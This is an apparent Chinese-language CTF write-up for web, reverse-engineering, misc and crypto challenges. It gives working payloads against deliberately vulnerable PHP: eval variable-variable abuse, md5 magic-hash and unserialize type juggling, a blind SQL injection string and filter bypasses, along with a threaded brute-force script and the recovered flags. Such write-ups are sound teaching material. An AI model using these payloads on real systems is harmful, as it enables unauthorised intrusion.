Web
简单的代码审计
源码:
<?php
// Challenge source: the page prints its own code, then var_dump()s whatever
// variable the visitor names via ?args=.
error_reporting(0);
include "flag1.php"; // presumably defines the flag variable seen in the dump below
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
// The filter only restricts the value to [A-Za-z0-9_]+. That blocks code
// injection syntax but not a bare variable name such as "GLOBALS".
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
// $$args is a variable variable built from request data and evaluated with
// eval(); naming the GLOBALS superglobal dumps every variable in scope,
// including anything flag1.php defined. Request data must never reach
// eval(); dump from a fixed whitelist of variable names instead.
eval("var_dump($$args);");
}
payload:
/index.php?args=GLOBALS
结果:
array(7) { ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["TheHiDdenfl4g"]=> string(25) "EIS{GE7_fl4g_w17h_GL0B4L}" ["args"]=> string(7) "GLOBALS" ["GLOBALS"]=> *RECURSION* }
快速计算
脚本如下:
import requests

# "Quick calculation" challenge endpoint.
url = "http://202.120.7.220:2333/"

# The expression to solve sits between the first <br/> and the answer <input>.
page = str(requests.get(url).content)
expr = page.split('<br/>')[1].split('=<input type="text" name="v"/>')[0]

# NOTE(review): eval() executes whatever expression the server returned; a
# hostile or tampered response would run as code on the solver's machine.
answer = eval(expr)

reply = requests.post(url, data={'v': answer})
print(reply.text)
不是管理员也能Login
发现源码:
$test=$_GET['userid']; $test=md5($test);
// Loose comparison: a digest of the form "0e<digits>" is a numeric string
// equal to 0, so `!= '0'` lets such a userid through. A strict `!==` (and
// a comparison against a real expected digest) closes this.
if($test != '0'){
$this->error('用户名有误,请阅读说明与帮助!');
}
$pwd =$this->_post("password");
// unserialize() on a POST body lets the client choose the types stored in
// $data_u; with the loose `==` below, a boolean true equals any non-empty
// string. Decode untrusted input with a data-only format (json_decode) and
// compare with `===`.
$data_u = unserialize($pwd);
if($data_u['name'] == 'XX' && $data_u['pwd']=='XX')
{
print_r($flag);
}
首先绕过md5。百度寻找MD5为0e开头即可。然后再利用php弱类型。TRUE==任意字符串。
最终payload
getdata:?userid=s878926199a
postdata:userid=s878926199a&password=a:2:{s:4:"name";b:1;s:3:"pwd";b:1;}
phptrick
http://202.120.7.221:2333/index.php?gift=a&flag=php://input
post:a 然后凯撒密钥13
EIS{jbfuvsynt}
随机数
首先,分析题目。没有任何入手点,猜测为爆破随机数。
然后记录了一下出现的随机数。写成脚本如下。
import requests
import threading
# Challenge endpoint polled by every worker thread.
url = 'http://202.112.26.124:8080/280a31eec4c62a893ad40a6508d207c8/index.php'
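def main(code):
    """Poll the challenge with one guessed code until the reply is not "wrong answer".

    A fresh PHPSESSID is taken from the landing page and reused for every
    request, so all guesses are made against the same session (which the
    writeup assumes holds the value being guessed). The loop prints the
    first body that does not contain "wrong answer" and then returns,
    instead of polling forever after a hit.

    Args:
        code: the candidate value sent as the ``code`` query parameter.
    """
    session_cookie = requests.get(url).headers['Set-Cookie'].split(';')[0]
    header = {'cookie': session_cookie}
    guess_url = url + '?code=' + str(code)  # invariant, so built once
    while True:
        try:
            r = requests.get(guess_url, headers=header)
        except requests.RequestException:
            # Only network-level failures are retried; anything else
            # (including KeyboardInterrupt) propagates instead of being
            # swallowed by a bare except.
            continue
        if 'wrong answer' not in r.text:
            print(r.text)
            return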
# Codes recorded from earlier responses; each one gets its own worker thread.
k = [278, 332, 653, 841, 394, 783, 210, 153, 93, 334, 749, 179, 841, 394, 783,
     188, 299, 537, 724, 612, 27, 334, 749, 179, 188, 299, 537, 119, 913, 605]
print("loading....")
# Build every thread first, then start them all.
t = [threading.Thread(target=main, args=(str(code),)) for code in k]
for worker in t:
    worker.start()
最终 getflag。
Login
盲注
exp: data="uname=admin'^(ascii(right(pwd,1))=100)^'1&pwd=admin"
脚本跑出来结果:fsaoaigafsdfsdubbwouibiaewrawe
登录得到flag:EIS{SQLI_INJECTIion_blind}
文件上传
无语的题,尝试各种姿势都不能绕过"<",试试数组发现得到flag:
exp:ext=php&content[]=a<aa&content[]=ssss
flag:EIS{6yp455_with_4rr4y}
PHP是最好的语言
和以前做过的原题类似,绕过+反序列化,构造请求参数:
?foo=a:2:{s:6:"param1";s:7:"2018aaa";s:6:"param2";a:5:{i:0;a:1:{i:0;i:1;}i:1;i:2;i:2;i:2;i:3;i:3;i:4;i:0;}}&egg[0]=%00MyAns&egg[1][]=nnnn&finish=1
得到flag:EIS{php_th3_b45t_l4ngu4g3}
RE
reverseme
import logging
logging.getLogger('angr.surveyor').setLevel(logging.DEBUG)
import angr
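def main():
    """Drive angr from a blank state at 0x004012E0 to the success block of ReverseMe.exe.

    The state gets a hand-built stack (argv pointers, argv, argc and the
    address used as main's return target, as annotated below), then the
    simulation manager explores towards the "found" address while
    avoiding the failure addresses. On a hit, the state's stdin and
    stdout dumps are printed; the stdin dump is presumably the input the
    binary accepts.
    """
    p = angr.Project("ReverseMe.exe")
    state = p.factory.blank_state(addr=0x004012E0)
    # Push order matters: the last push ends up on top of the stack.
    state.stack_push(0xd0000010)  # pointer to argv[1]
    state.stack_push(0xd0000000)  # pointer to argv[0]
    state.stack_push(state.regs.esp)  # argv
    state.stack_push(2)  # argc
    state.stack_push(0x401f30)  # address of main
    sm = p.factory.simgr(state)
    print("123")  # progress marker before the (slow) exploration
    ex = sm.explore(find=0x00403D99, avoid=(0x00403DCF, 0x00403E12, 0x00403E01))
    if ex.found:
        print("yes you got it")
        found = ex.found[0]
        print(found.posix.dumps(0))  # stdin fed along the successful path
        print(found.posix.dumps(1))  # stdout produced along it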
# Only run the solver when executed directly, not when imported.
if __name__ == '__main__':
    main()
#EIS{wadx_tdgk_aihc_ihkn_pjlm}
IgniteMe:
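# IgniteMe: invert the transformation the binary applies to the embedded
# string (per the writeup) to recover the accepted input.
aa = 'GONDPHyGjPEKruv{{pj]X@rF'
bb = [0x0D, 0x13, 0x17, 0x11, 0x02, 0x01, 0x20, 0x1D, 0x0C, 0x02, 0x19, 0x2F,
      0x17, 0x2B, 0x24, 0x1F, 0x1E, 0x16, 0x09, 0x0F, 0x15, 0x27, 0x13, 0x26,
      0x0A, 0x2F, 0x1E, 0x1A, 0x2D, 0x0C, 0x22, 0x04]


def _decode(enc, key):
    """Recover the input: per position XOR with the key byte, subtract 72,
    XOR with 0x55, then swap ASCII letter case.

    Only the first ``len(enc)`` key entries are consumed (``bb`` has 32
    entries, ``aa`` 24 characters). Returns the recovered text as a str;
    raises IndexError if *key* is shorter than *enc*.
    """
    out = []
    for i, ch in enumerate(enc):
        c = ((ord(ch) ^ key[i]) - 72) ^ 0x55
        if 0x41 <= c <= 0x5A:  # upper -> lower
            c += 0x20
        elif 0x61 <= c <= 0x7A:  # lower -> upper
            c -= 0x20
        out.append(chr(c))
    return ''.join(out)


dd = _decode(aa, bb)
cc = [ord(ch) for ch in dd]  # the decoded values as ints, as before
print(len(bb))
print(dd)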
#EIS{wadx_tdgk_aihc_ihkn_pjlm}
mobile
jeb不能反编译,直接ida,分析后发现关键函数final_check
分别打开两个so文件,定位final_check函数
MISC
隐藏在黑夜里的秘密
stegsolve打开bmp即可
DNS101
dns 服务器信息泄露
根据服务器信息可以陆续得到以下信息:
n.flag.src.edu-info.edu.cn.
z.flag.src.edu-info.edu.cn.
zz.flag.src.edu-info.edu.cn.
zzz.flag.src.edu-info.edu.cn.
.
.
.
zlar4eslumoafroa8piucrlawouy4est.zzzzzzz.flag.src.edu-info.edu.cn
dig flag-id-ztfrneclyudrfq3e6endq5.zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.zzzzzzz.flag.src.edu-info.edu.cn ANY
easy crypto
查看加密脚本,原题。RC4加密而已。
# -*- coding: utf-8 -*-
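def rc4(data, key):
    """Apply RC4 to *data* under *key* and return the result as a str.

    RC4 is symmetric, so the same call both encrypts and decrypts. Both
    arguments are treated as sequences of byte-sized code points (str
    characters in the 0..255 range), which is how the challenge script
    feeds them in.

    Args:
        data: text to transform; each character is XORed with one
            keystream byte.
        key: keying string, cycled over the 256-entry state during setup.

    Returns:
        A str of the same length as *data*.

    Raises:
        ValueError: if *key* is empty.
    """
    if not key:
        raise ValueError("rc4: key must not be empty")
    # Key-scheduling algorithm (KSA). list() keeps the state mutable on
    # Python 3, where range() no longer returns a list.
    s = list(range(256))
    key_len = len(key)
    j = 0
    for i in range(256):
        j = (j + s[i] + ord(key[i % key_len])) % 256
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation (PRGA): one keystream byte per input char.
    i = j = 0
    out = []
    for char in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(chr(ord(char) ^ s[(s[i] + s[j]) % 256]))
    return ''.join(out)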
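# Ciphertext taken from the challenge, keyed with the hard-coded "hello world".
# RC4 is symmetric, so this call decrypts it.
encodedata = rc4('\xca\xee\x86\x30\x48\xc4\xec\x56\x3d\x22\x2a\xbc\x9a\x95\x70\x23\x39\x76\x3b\xee\x09\x29\x2b\x01\x54\x00\x87\x5e\x37\x23\x3e\x79\x8b\x7b\xa9\x20\x78', 'hello world')
print(encodedata)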
EIS{55a0a84f86a6ad40006f014619577ad3}